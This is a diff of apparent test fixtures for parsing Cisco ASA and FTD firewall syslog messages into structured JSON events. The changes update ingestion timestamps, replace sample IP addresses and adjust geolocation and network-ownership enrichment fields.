-771,7 +768,7 @@ }, "event": { "severity": 7, - "ingested": "2021-07-19T09:05:57.086503922Z", + "ingested": "2021-12-09T13:31:25.162890900Z", "original": "May 5 17:51:17 dev01: %FTD-7-710006: VRRP request discarded from 192.168.2.2 to fw111:192.18.4", "code": "710006", "kind": "event", @@ -826,8 +823,8 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:05:57.086505920Z", - "original": "May 5 17:51:17 dev01: %FTD-4-313005: No matching connection for ICMP error message: icmp src fw111:10.192.33.100 dst fw111:192.18.4 (type 3, code 3) on fw111 interface. Original IP payload: udp src 192.18.4/53 dst 8.8.8.8/10872.", + "ingested": "2021-12-09T13:31:25.162896700Z", + "original": "May 5 17:51:17 dev01: %FTD-4-313005: No matching connection for ICMP error message: icmp src fw111:10.192.33.100 dst fw111:192.18.4 (type 3, code 3) on fw111 interface. Original IP payload: udp src 192.18.4/53 dst 81.2.69.144/10872.", "code": "313005", "kind": "event", "action": "firewall-rule", @@ -854,7 +851,7 @@ }, "source": { "nat": { - "ip": "8.8.8.8" + "ip": "81.2.69.144" }, "address": "10.10.10.10", "ip": "10.10.10.10" @@ -882,7 +879,7 @@ ], "ip": [ "10.10.10.10", - "8.8.8.8", + "81.2.69.144", "192.168.2.2" ] }, @@ -891,8 +888,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:05:57.086507628Z", - "original": "May 5 18:16:21 dev01: %ASA-6-302021: Teardown ICMP connection for faddr 192.168.2.2/0 gaddr 8.8.8.8/2 laddr 10.10.10.10/2 type 8 code 0", + "ingested": "2021-12-09T13:31:25.162903400Z", + "original": "May 5 18:16:21 dev01: %ASA-6-302021: Teardown ICMP connection for faddr 192.168.2.2/0 gaddr 81.2.69.144/2 laddr 10.10.10.10/2 type 8 code 0", "code": "302021", "kind": "event", "action": "flow-expiration", @@ -906,7 +903,7 @@ }, "cisco": { "asa": { - "mapped_source_ip": "8.8.8.8", + "mapped_source_ip": "81.2.69.144", "icmp_type": 8, "icmp_code": 0 } @@ -951,7 +948,7 @@ }, "event": { "severity": 7, - "ingested": "2021-07-19T09:05:57.086509334Z", + "ingested": "2021-12-09T13:31:25.162910Z", "original": "May 5 18:22:35 dev01: %ASA-7-609001: Built local-host net:10.10.10.10", "code": "609001", "kind": "event", @@ -1010,7 +1007,7 @@ "event": { "severity": 7, "duration": 0, - "ingested": "2021-07-19T09:05:57.086511048Z", + "ingested": "2021-12-09T13:31:25.162916500Z", "original": "May 5 18:24:31 dev01: %ASA-7-609002: Teardown local-host identity:10.10.10.10 duration 0:00:00", "code": "609002", "kind": "event", @@ -1041,7 +1038,7 @@ }, "source": { "nat": { - "ip": "8.8.8.8" + "ip": "81.2.69.144" }, "address": "10.192.46.90", "ip": "10.192.46.90" @@ -1069,7 +1066,7 @@ ], "ip": [ "10.192.46.90", - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -1078,8 +1075,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:05:57.086512745Z", - "original": "May 5 18:29:32 dev01: %ASA-6-302020: Built inbound ICMP connection for faddr 10.10.10.10/0 gaddr 8.8.8.8/0 laddr 10.192.46.90/0", + "ingested": "2021-12-09T13:31:25.162923100Z", + "original": "May 5 18:29:32 dev01: %ASA-6-302020: Built inbound ICMP connection for faddr 10.10.10.10/0 gaddr 81.2.69.144/0 laddr 10.192.46.90/0", "code": "302020", "kind": "event", "action": "flow-expiration", @@ -1093,7 +1090,7 @@ }, "cisco": { "asa": { - "mapped_source_ip": "8.8.8.8" + "mapped_source_ip": "81.2.69.144" } } }, @@ -1107,7 +1104,7 @@ }, "source": { "nat": { - "ip": "8.8.8.8" + "ip": "81.2.69.144" }, "address": "192.168.2.2", "ip": "192.168.2.2" @@ -1135,7 +1132,7 @@ ], "ip": [ "192.168.2.2", - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -1144,8 +1141,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:05:57.086514613Z", - "original": "May 5 18:29:32 dev01: %ASA-6-302020: Built outbound ICMP connection for faddr 10.10.10.10/0 gaddr 8.8.8.8/0 laddr 192.168.2.2/0 type 3 code 3", + "ingested": "2021-12-09T13:31:25.162929900Z", + "original": "May 5 18:29:32 dev01: %ASA-6-302020: Built outbound ICMP connection for faddr 10.10.10.10/0 gaddr 81.2.69.144/0 laddr 192.168.2.2/0 type 3 code 3", "code": "302020", "kind": "event", "action": "flow-expiration", @@ -1159,7 +1156,7 @@ }, "cisco": { "asa": { - "mapped_source_ip": "8.8.8.8", + "mapped_source_ip": "81.2.69.144", "icmp_type": 3, "icmp_code": 3 } @@ -1223,7 +1220,7 @@ "severity": 6, "duration": 0, "reason": "TCP Reset-I", - "ingested": "2021-07-19T09:05:57.086516327Z", + "ingested": "2021-12-09T13:31:25.162936400Z", "original": "May 5 18:29:32 dev01: %ASA-6-302014: Teardown TCP connection 2960892904 for out111:10.10.10.10/443 to fw111:192.168.2.2/55225 duration 0:00:00 bytes 0 TCP Reset-I", "code": "302014", "kind": "event", @@ -1252,7 +1249,7 @@ }, "destination": { "nat": { - "ip": "8.8.8.8" + "ip": "81.2.69.144" }, "address": "10.10.10.10", "port": 54839, @@ -1260,7 +1257,7 @@ }, "source": { "nat": { - "ip": "8.8.8.8" + "ip": "81.2.69.144" }, "address": "192.168.2.2", "port": 80, @@ -1300,7 +1297,7 @@ ], "ip": [ "192.168.2.2", - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -1309,8 +1306,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:05:57.086517980Z", - "original": "May 5 18:29:32 dev01: %ASA-6-302013: Built outbound TCP connection 1588662 for intfacename:192.168.2.2/80 (8.8.8.8/80) to net:10.10.10.10/54839 (8.8.8.8/54839)", + "ingested": "2021-12-09T13:31:25.162942900Z", + "original": "May 5 18:29:32 dev01: %ASA-6-302013: Built outbound TCP connection 1588662 for intfacename:192.168.2.2/80 (81.2.69.144/80) to net:10.10.10.10/54839 (81.2.69.144/54839)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -1325,8 +1322,8 @@ "asa": { "destination_interface": "net", "mapped_source_port": 80, - "mapped_destination_ip": "8.8.8.8", - "mapped_source_ip": "8.8.8.8", + "mapped_destination_ip": "81.2.69.144", + "mapped_source_ip": "81.2.69.144", "connection_id": "1588662", "source_interface": "intfacename", "mapped_destination_port": 54839 @@ -1389,7 +1386,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-07-19T09:05:57.086519682Z", + "ingested": "2021-12-09T13:31:25.162949400Z", "original": "May 5 18:29:32 dev01: %ASA-6-302012: Teardown dynamic UDP translation from fw111:10.10.10.10/54230 to out111:192.168.2.2/54230 duration 0:00:00", "code": "302012", "kind": "event", @@ -1459,7 +1456,7 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:05:57.086521342Z", + "ingested": "2021-12-09T13:31:25.162956Z", "original": "May 5 18:40:50 dev01: %ASA-4-313004: Denied ICMP type=0, from laddr 10.10.10.10 on interface fw502 to 192.168.2.2: no matching session", "code": "313004", "kind": "event", @@ -1535,7 +1532,7 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:05:57.086523016Z", + "ingested": "2021-12-09T13:31:25.162962600Z", "original": "May 5 18:40:50 dev01: %ASA-6-305011: Built dynamic TCP translation from fw111:10.10.10.10/57006 to out111:192.168.2.2/57006", "code": "305011", "kind": "event", @@ -1605,7 +1602,7 @@ }, "event": { "severity": 2, - "ingested": "2021-07-19T09:05:57.086524660Z", + "ingested": "2021-12-09T13:31:25.162969500Z", "original": "May 5 18:40:50 dev01: %ASA-2-106001: Inbound TCP connection denied from 192.168.2.2/43803 to 10.10.10.10/14322 flags SYN on interface out111", "code": "106001", "kind": "event", @@ -1630,27 +1627,9 @@ "level": "critical" }, "destination": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-CA", - "city_name": "Thousand Oaks", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "California", - "location": { - "lon": -118.8199, - "lat": 34.197 - } - }, - "as": { - "number": 395776, - "organization": { - "name": "FEDERAL ONLINE GROUP LLC" - } - }, - "address": "192.186.2.2", "port": 53356, - "ip": "192.186.2.2" + "address": "1192.168.2.2", + "domain": "1192.168.2.2" }, "source": { "port": 161, @@ -1687,11 +1666,11 @@ }, "related": { "hosts": [ - "dev01" + "dev01", + "1192.168.2.2" ], "ip": [ - "10.10.10.10", - "192.186.2.2" + "10.10.10.10" ] }, "host": { @@ -1700,8 +1679,8 @@ "event": { "severity": 2, "duration": 124000000000, - "ingested": "2021-07-19T09:05:57.086526496Z", - "original": "May 5 18:40:50 dev01: %ASA-2-302016: Teardown UDP connection 1671727 for intfacename:10.10.10.10/161 to net:192.186.2.2/53356 duration 0:02:04 bytes 64585", + "ingested": "2021-12-09T13:31:25.162976200Z", + "original": "May 5 18:40:50 dev01: %ASA-2-302016: Teardown UDP connection 1671727 for intfacename:10.10.10.10/161 to net:1192.168.2.2/53356 duration 0:02:04 bytes 64585", "code": "302016", "kind": "event", "start": "2021-05-05T18:38:46.000Z", @@ -1729,7 +1708,7 @@ }, "destination": { "nat": { - "ip": "8.8.8.8" + "ip": "81.2.69.144" }, "address": "192.168.2.2", "port": 22638, @@ -1737,7 +1716,7 @@ }, "source": { "nat": { - "ip": "8.8.8.4" + "ip": "81.2.69.144" }, "address": "10.10.10.10", "port": 161, @@ -1777,9 +1756,8 @@ ], "ip": [ "10.10.10.10", - "8.8.8.4", - "192.168.2.2", - "8.8.8.8" + "81.2.69.144", + "192.168.2.2" ] }, "host": { @@ -1787,8 +1765,8 @@ }, "event": { "severity": 2, - "ingested": "2021-07-19T09:05:57.086528138Z", - "original": "May 5 18:40:50 dev01: %ASA-2-302015: Built outbound UDP connection 1743372 for intfacename:10.10.10.10/161 (8.8.8.4/161) to net:192.168.2.2/22638 (8.8.8.8/22638)", + "ingested": "2021-12-09T13:31:25.162982800Z", + "original": "May 5 18:40:50 dev01: %ASA-2-302015: Built outbound UDP connection 1743372 for intfacename:10.10.10.10/161 (81.2.69.144/161) to net:192.168.2.2/22638 (81.2.69.144/22638)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -1803,8 +1781,8 @@ "asa": { "destination_interface": "net", "mapped_source_port": 161, - "mapped_destination_ip": "8.8.8.8", - "mapped_source_ip": "8.8.8.4", + "mapped_destination_ip": "81.2.69.144", + "mapped_source_ip": "81.2.69.144", "connection_id": "1743372", "source_interface": "intfacename", "mapped_destination_port": 22638 @@ -1817,7 +1795,7 @@ }, "destination": { "nat": { - "ip": "8.8.8.8" + "ip": "81.2.69.144" }, "address": "192.168.2.2", "port": 22638, @@ -1825,7 +1803,7 @@ }, "source": { "nat": { - "ip": "8.8.8.4" + "ip": "81.2.69.144" }, "address": "10.10.10.10", "port": 161, @@ -1865,9 +1843,8 @@ ], "ip": [ "10.10.10.10", - "8.8.8.4", - "192.168.2.2", - "8.8.8.8" + "81.2.69.144", + "192.168.2.2" ] }, "host": { @@ -1875,8 +1852,8 @@ }, "event": { "severity": 2, - "ingested": "2021-07-19T09:05:57.086529828Z", - "original": "May 5 18:40:50 dev01: %ASA-2-302015: Built outbound UDP connection 1743372 for intfacename:10.10.10.10/161 (8.8.8.4/161) to net:192.168.2.2/22638 (8.8.8.8/22638)", + "ingested": "2021-12-09T13:31:25.162992400Z", + "original": "May 5 18:40:50 dev01: %ASA-2-302015: Built outbound UDP connection 1743372 for intfacename:10.10.10.10/161 (81.2.69.144/161) to net:192.168.2.2/22638 (81.2.69.144/22638)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -1891,8 +1868,8 @@ "asa": { "destination_interface": "net", "mapped_source_port": 161, - "mapped_destination_ip": "8.8.8.8", - "mapped_source_ip": "8.8.8.4", + "mapped_destination_ip": "81.2.69.144", + "mapped_source_ip": "81.2.69.144", "connection_id": "1743372", "source_interface": "intfacename", "mapped_destination_port": 22638 @@ -1954,7 +1931,7 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:05:57.086531503Z", + "ingested": "2021-12-09T13:31:25.162997900Z", "original": "May 5 18:40:50 dev01: %ASA-4-106023: Deny tcp src fw111:10.10.10.10/64388 dst out111:192.168.2.2/443 by access-group \"out1111_access_out\" [0x47e21ef4, 0x47e21ef4]", "code": "106023", "kind": "event", @@ -2024,7 +2001,7 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:05:57.086533203Z", + "ingested": "2021-12-09T13:31:25.163003300Z", "original": "May 5 18:40:50 dev01: %ASA-4-106021: Deny TCP reverse path check from 192.168.2.2 to 10.10.10.10 on interface fw111", "code": "106021", "kind": "event", @@ -2095,7 +2072,7 @@ }, "event": { "severity": 2, - "ingested": "2021-07-19T09:05:57.086534863Z", + "ingested": "2021-12-09T13:31:25.163009800Z", "original": "May 5 19:02:58 dev01: %ASA-2-106006: Deny inbound UDP from 192.168.2.2/65020 to 10.10.10.10/65020 on interface fw111", "code": "106006", "kind": "event", @@ -2165,7 +2142,7 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:05:57.086536607Z", + "ingested": "2021-12-09T13:31:25.163016400Z", "original": "May 5 19:02:58 dev01: %ASA-6-106015: Deny TCP (no connection) from 192.168.2.2/53089 to 10.10.10.10/443 flags FIN PSH ACK on interface out111", "code": "106015", "kind": "event", @@ -2235,7 +2212,7 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:05:57.086538302Z", + "ingested": "2021-12-09T13:31:25.163020900Z", "original": "May 5 19:02:58 dev01: %ASA-6-106015: Deny TCP (no connection) from 192.168.2.2/17127 to 10.10.10.10/443 flags PSH ACK on interface out111", "code": "106015", "kind": "event", @@ -2305,7 +2282,7 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:05:57.086539979Z", + "ingested": "2021-12-09T13:31:25.163026300Z", "original": "May 5 19:02:58 dev01: %ASA-6-106015: Deny TCP (no connection) from 192.168.2.2/24223 to 10.10.10.10/443 flags RST on interface fw111", "code": "106015", "kind": "event", @@ -2380,8 +2357,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:05:57.086541778Z", - "original": "May 5 19:02:58 dev01: %ASA-6-302022: Built director stub TCP connection for fw1111:10.10.10.10/38540 (8.8.8.5/38540) to net:192.168.2.2/10051 (8.8.8.8/10051)", + "ingested": "2021-12-09T13:31:25.163033Z", + "original": "May 5 19:02:58 dev01: %ASA-6-302022: Built director stub TCP connection for fw1111:10.10.10.10/38540 (8.8.8.5/38540) to net:192.168.2.2/10051 (81.2.69.144/10051)", "code": "302022", "kind": "event", "action": "firewall-rule", @@ -2454,8 +2431,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:05:57.086543487Z", - "original": "May 5 19:02:58 dev01: %ASA-6-302022: Built forwarder stub TCP connection for fw111:10.10.10.10/38540 (8.8.8.5/38540) to net:192.168.2.2/10051 (8.8.8.8/10051)", + "ingested": "2021-12-09T13:31:25.163038700Z", + "original": "May 5 19:02:58 dev01: %ASA-6-302022: Built forwarder stub TCP connection for fw111:10.10.10.10/38540 (8.8.8.5/38540) to net:192.168.2.2/10051 (81.2.69.144/10051)", "code": "302022", "kind": "event", "action": "firewall-rule", @@ -2528,8 +2505,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:05:57.086545260Z", - "original": "May 5 19:02:58 dev01: %ASA-6-302022: Built backup stub TCP connection for fw111:10.10.10.10/38540 (8.8.8.5/38540) to net:192.1682.2.2/10051 (8.8.8.8/10051)", + "ingested": "2021-12-09T13:31:25.163043700Z", + "original": "May 5 19:02:58 dev01: %ASA-6-302022: Built backup stub TCP connection for fw111:10.10.10.10/38540 (8.8.8.5/38540) to net:192.1682.2.2/10051 (81.2.69.144/10051)", "code": "302022", "kind": "event", "action": "firewall-rule", @@ -2605,7 +2582,7 @@ "severity": 6, "duration": 0, "reason": "Cluster flow with CLU closed on owner", - "ingested": "2021-07-19T09:05:57.086546926Z", + "ingested": "2021-12-09T13:31:25.163049Z", "original": "May 5 19:02:58 dev01: %ASA-6-302023: Teardown stub TCP connection for fw111:10.10.10.10/39210 to net:192.168.2.2/10051 duration 0:00:00 forwarded bytes 0 Cluster flow with CLU closed on owner", "code": "302023", "kind": "event", @@ -2684,7 +2661,7 @@ "severity": 6, "duration": 0, "reason": "Forwarding or redirect flow removed to create director or backup flow", - "ingested": "2021-07-19T09:05:57.086548589Z", + "ingested": "2021-12-09T13:31:25.163053700Z", "original": "May 5 19:02:58 dev01: %ASA-6-302023: Teardown stub TCP connection for net:10.10.10.10/10051 to unknown:192.168.2.2/39222 duration 0:00:00 forwarded bytes 0 Forwarding or redirect flow removed to create director or backup flow", "code": "302023", "kind": "event", @@ -2735,7 +2712,7 @@ }, "event": { "severity": 7, - "ingested": "2021-07-19T09:05:57.086550311Z", + "ingested": "2021-12-09T13:31:25.163059400Z", "original": "May 5 19:03:27 dev01: %ASA-7-111009: User 'aaaa' executed cmd: show access-list fw211111_access_out brief", "code": "111009", "kind": "event", @@ -2786,7 +2763,7 @@ }, "event": { "severity": 7, - "ingested": "2021-07-19T09:05:57.086552061Z", + "ingested": "2021-12-09T13:31:25.163065900Z", "original": "May 5 19:02:26 dev01: %ASA-7-111009: User 'aaaa' executed cmd: show access-list aaa_out brief", "code": "111009", "kind": "event", @@ -2862,7 +2839,7 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:05:57.086555023Z", + "ingested": "2021-12-09T13:31:25.163072400Z", "original": "May 5 19:02:26 dev01: %ASA-6-106100: access-list fw111_out permitted tcp ptaaac/192.168.2.2(62157) -\u003e fw111/10.10.10.10(3452) hit-cnt 1 first hit [0x38ff326b, 0x00000000]", "code": "106100", "kind": "event", @@ -2939,7 +2916,7 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:05:57.086556858Z", + "ingested": "2021-12-09T13:31:25.163078900Z", "original": "May 5 19:02:26 dev01: %ASA-6-106100: access-list fw111_out permitted tcp net/192.168.2.2(49033) -\u003e fw111/10.10.10.10(6007) hit-cnt 2 300-second interval [0x38ff326b, 0x00000000]", "code": "106100", "kind": "event", @@ -2985,7 +2962,7 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:05:57.086559272Z", + "ingested": "2021-12-09T13:31:25.163085500Z", "original": "May 5 19:02:26 dev01: %ASA-6-302027: Teardown stub ICMP connection for fw1111:10.10.10.10/6426 to net:192.168.2.2/0 duration 1:00:04 forwarded bytes 56 Cluster flow with CLU closed on owner", "code": "302027", "kind": "event", @@ -3028,8 +3005,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:05:57.086564615Z", - "original": "May 5 19:02:26 dev01: %ASA-6-302026: Built director stub ICMP connection for fw111:10.10.10.10/32004 (8.8.8.5) to net:192.168.2.2/0 (8.8.8.8)", + "ingested": "2021-12-09T13:31:25.163091900Z", + "original": "May 5 19:02:26 dev01: %ASA-6-302026: Built director stub ICMP connection for fw111:10.10.10.10/32004 (8.8.8.5) to net:192.168.2.2/0 (81.2.69.144)", "code": "302026", "kind": "event", "action": "firewall-rule", @@ -3097,7 +3074,7 @@ }, "event": { "severity": 7, - "ingested": "2021-07-19T09:05:57.086566426Z", + "ingested": "2021-12-09T13:31:25.163098400Z", "original": "May 5 19:02:26 dev01: %ASA-7-710005: UDP request discarded from 10.10.10.10/1985 to net:192.168.2.2/1985", "code": "710005", "kind": "event", @@ -3141,7 +3118,7 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:05:57.086568118Z", + "ingested": "2021-12-09T13:31:25.163104800Z", "original": "May 5 19:02:26 dev01: %ASA-6-302025: Teardown stub UDP connection for net:192.168.2.2/123 to unknown:10.10.10.10/123 duration 0:01:00 forwarded bytes 48 Cluster flow with CLU removed from due to idle timeout", "code": "302025", "kind": "event", @@ -3184,8 +3161,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:05:57.086569821Z", - "original": "May 5 19:02:26 dev01: %ASA-6-302024: Built backup stub UDP connection for net:192.168.2.2/9051 (8.8.8.5(19051) to fw111:10.10.10.10/123 (8.8.8.8/123)", + "ingested": "2021-12-09T13:31:25.163111300Z", + "original": "May 5 19:02:26 dev01: %ASA-6-302024: Built backup stub UDP connection for net:192.168.2.2/9051 (8.8.8.5(19051) to fw111:10.10.10.10/123 (81.2.69.144/123)", "code": "302024", "kind": "event", "action": "firewall-rule", @@ -3256,7 +3233,7 @@ }, "event": { "severity": 3, - "ingested": "2021-07-19T09:05:57.086571516Z", + "ingested": "2021-12-09T13:31:25.163117800Z", "original": "May 5 19:02:26 dev01: %ASA-3-106014: Deny inbound icmp src fw111:10.10.10.10 dst fw111:10.10.10.10(type 8, code 0)", "code": "106014", "kind": "event", @@ -3301,7 +3278,7 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:05:57.086573238Z", + "ingested": "2021-12-09T13:31:25.163124200Z", "original": "May 5 19:02:25 dev01: %ASA-4-733100: [192.168.2.2] drop rate-1 exceeded. Current burst rate is 0 per second, max configured rate is -4; Current average rate is 7 per second, max configured rate is -4; Cumulative total count is 9063", "code": "733100", "kind": "event", @@ -3384,7 +3361,7 @@ }, "event": { "severity": 3, - "ingested": "2021-07-19T09:05:57.086574972Z", + "ingested": "2021-12-09T13:31:25.163130700Z", "original": "May 5 19:02:25 dev01: %ASA-3-106010: Deny inbound sctp src fw111:10.10.10.10/5114 dst fw111:10.10.10.10/2", "code": "106010", "kind": "event", @@ -3460,7 +3437,7 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:05:57.086576688Z", + "ingested": "2021-12-09T13:31:25.163137100Z", "original": "May 5 19:02:25 dev01: %ASA-4-507003: tcp flow from fw111:10.10.10.10/49574 to out111:192.168.2.2/80 terminated by inspection engine, reason - disconnected, dropped packet.", "code": "507003", "kind": "event", @@ -3523,7 +3500,7 @@ }, "event": { "severity": 5, - "ingested": "2021-07-19T09:05:57.086578574Z", + "ingested": "2021-12-09T13:31:25.163143800Z", "original": "Apr 27 04:18:49 dev01: %ASA-5-304001: 10.20.30.40 Accessed URL 10.20.30.40:http://10.20.30.40/", "code": "304001", "kind": "event", @@ -3585,7 +3562,7 @@ }, "event": { "severity": 5, - "ingested": "2021-07-19T09:05:57.086580245Z", + "ingested": "2021-12-09T13:31:25.163150300Z", "original": "Apr 27 04:18:49 dev01: %ASA-5-304001: 10.20.30.40 Accessed URL someuser@10.20.30.40:http://10.20.30.40/IOFUHSIU98[0]", "code": "304001", "kind": "event", @@ -3647,7 +3624,7 @@ }, "event": { "severity": 5, - "ingested": "2021-07-19T09:05:57.086581960Z", + "ingested": "2021-12-09T13:31:25.163155200Z", "original": "Apr 27 17:54:52 dev01: %ASA-5-304001: 10.20.30.40 Accessed JAVA URL 10.20.30.40:http://10.20.30.40/some/longer/url-asd-er9789870[0]_=23", "code": "304001", "kind": "event", @@ -3709,7 +3686,7 @@ }, "event": { "severity": 5, - "ingested": "2021-07-19T09:05:57.086583658Z", + "ingested": "2021-12-09T13:31:25.163160400Z", "original": "Apr 27 04:18:49 dev01: %ASA-5-304001: 10.20.30.40 Accessed JAVA URL someuser@10.20.30.40:http://10.20.30.40/", "code": "304001", "kind": "event", @@ -3734,42 +3711,48 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "FR-63", - "city_name": "Clermont-Ferrand", - "country_iso_code": "FR", - "country_name": "France", - "region_name": "Puy-de-Dôme", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", "location": { - "lon": 3.0966, - "lat": 45.7838 + "lon": -1.3614, + "lat": 51.7095 } }, "as": { - "number": 3215, + "number": 20712, "organization": { - "name": "Orange" + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "2.3.4.5", + "address": "81.2.69.144", "port": 9101, - "ip": "2.3.4.5" + "ip": "81.2.69.144" }, "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "RU-MOW", - "city_name": "Moscow", - "country_iso_code": "RU", - "country_name": "Russia", - "region_name": "Moscow", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", "location": { - "lon": 37.6172, - "lat": 55.7527 + "lon": -1.3614, + "lat": 51.7095 + } + }, + "as": { + "number": 20712, + "organization": { + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "1.2.3.4", + "address": "81.2.69.144", "port": 54242, - "ip": "1.2.3.4" + "ip": "81.2.69.144" }, "tags": [ "preserve_original_event" @@ -3804,8 +3787,7 @@ "dev01" ], "ip": [ - "1.2.3.4", - "2.3.4.5" + "81.2.69.144" ] }, "host": { @@ -3815,8 +3797,8 @@ "severity": 6, "duration": 3602000000000, "reason": "Connection timeout", - "ingested": "2021-07-19T09:05:57.086585355Z", - "original": "Apr 27 04:12:23 dev01: %ASA-6-302304: Teardown TCP state-bypass connection 2751765169 from server.deflan:1.2.3.4/54242 to server.deflan:2.3.4.5/9101 duration 1:00:02 bytes 245 Connection timeout", + "ingested": "2021-12-09T13:31:25.163166600Z", + "original": "Apr 27 04:12:23 dev01: %ASA-6-302304: Teardown TCP state-bypass connection 2751765169 from server.deflan:81.2.69.144/54242 to server.deflan:81.2.69.144/9101 duration 1:00:02 bytes 245 Connection timeout", "code": "302304", "kind": "event", "start": "2021-04-27T03:12:21.000Z", @@ -3893,7 +3875,7 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:05:57.086587091Z", + "ingested": "2021-12-09T13:31:25.163172300Z", "original": "Apr 27 02:02:02 dev01: %ASA-4-106023: Deny tcp src outside:10.10.10.2/56444 dst srv:192.168.2.2/51635(testhostname.domain) by access-group \"global_access_1\"", "code": "106023", "kind": "event", @@ -3920,27 +3902,9 @@ "level": "notification" }, "destination": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "LV-RIX", - "city_name": "Riga", - "country_iso_code": "LV", - "country_name": "Latvia", - "region_name": "Riga", - "location": { - "lon": 24.0978, - "lat": 56.9496 - } - }, - "as": { - "number": 12578, - "organization": { - "name": "SIA Tet" - } - }, - "address": "195.122.12.242", "port": 53, - "ip": "195.122.12.242" + "address": "192.168.157.61", + "ip": "192.168.157.61" }, "source": { "port": 27218, @@ -3980,7 +3944,7 @@ "somedomainname.local" ], "ip": [ - "195.122.12.242" + "192.168.157.61" ] }, "host": { @@ -3988,8 +3952,8 @@ }, "event": { "severity": 5, - "ingested": "2021-07-19T09:05:57.086595499Z", - "original": "Oct 20 2019 15:15:15 dev01: %ASA-5-106100: access-list testrulename denied tcp insideintf/somedomainname.local(27218) -\u003e OUTSIDE/195.122.12.242(53) hit-cnt 1 first hit [0x16847359, 0x00000000]", + "ingested": "2021-12-09T13:31:25.163176700Z", + "original": "Oct 20 2019 15:15:15 dev01: %ASA-5-106100: access-list testrulename denied tcp insideintf/somedomainname.local(27218) -\u003e OUTSIDE/192.168.157.61(53) hit-cnt 1 first hit [0x16847359, 0x00000000]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -4042,7 +4006,7 @@ }, "event": { "severity": 5, - "ingested": "2021-07-19T09:05:57.086600770Z", + "ingested": "2021-12-09T13:31:25.163182Z", "original": "Apr 27 02:03:03 dev01: %ASA-5-111004: console end configuration: OK", "code": "111004", "kind": "event", @@ -4100,7 +4064,7 @@ }, "event": { "severity": 5, - "ingested": "2021-07-19T09:05:57.086603139Z", + "ingested": "2021-12-09T13:31:25.163188600Z", "original": "Apr 27 02:03:03 dev01: %ASA-5-111010: User 'enable_15', running 'CLI' from IP 10.10.0.87, executed 'clear'", "code": "111010", "kind": "event", @@ -4148,7 +4112,7 @@ }, "event": { "severity": 5, - "ingested": "2021-07-19T09:05:57.086604910Z", + "ingested": "2021-12-09T13:31:25.163193300Z", "original": "Apr 27 02:03:03 dev01: %ASA-5-502103: User priv level changed: Uname: enable_15 From: 1 To: 15", "code": "502103", "kind": "event", @@ -4226,7 +4190,7 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:05:57.086606694Z", + "ingested": "2021-12-09T13:31:25.163198100Z", "original": "Apr 27 02:03:03 dev01: %ASA-6-605004: Login denied from 10.10.1.212/51923 to FCD-FS-LAN:10.10.1.254/https for user \"*****\"", "code": "605004", "kind": "event", @@ -4286,7 +4250,7 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:05:57.086608448Z", + "ingested": "2021-12-09T13:31:25.163202100Z", "original": "Apr 27 02:03:03 dev01: %ASA-6-611102: User authentication failed: IP address: 10.10.0.87, Uname: admin", "code": "611102", "kind": "event", @@ -4357,7 +4321,7 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:05:57.086610181Z", + "ingested": "2021-12-09T13:31:25.163207200Z", "original": "Apr 27 02:03:03 dev01: %ASA-6-605005: Login permitted from 10.10.0.87/6651 to FCD-FS-LAN:10.10.1.254/ssh for user \"admin\"", "code": "605005", "kind": "event", @@ -4417,7 +4381,7 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:05:57.086611905Z", + "ingested": "2021-12-09T13:31:25.163212600Z", "original": "Apr 27 02:03:03 dev01: %ASA-6-611101: User authentication succeeded: IP address: 10.10.0.87, Uname: admin", "code": "611101", "kind": "event", @@ -4441,24 +4405,24 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-ENG", - "city_name": "London", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "England", + "region_name": "Oxfordshire", "location": { - "lon": -0.0247, - "lat": 51.5888 + "lon": -1.3614, + "lat": 51.7095 } }, "as": { - "number": 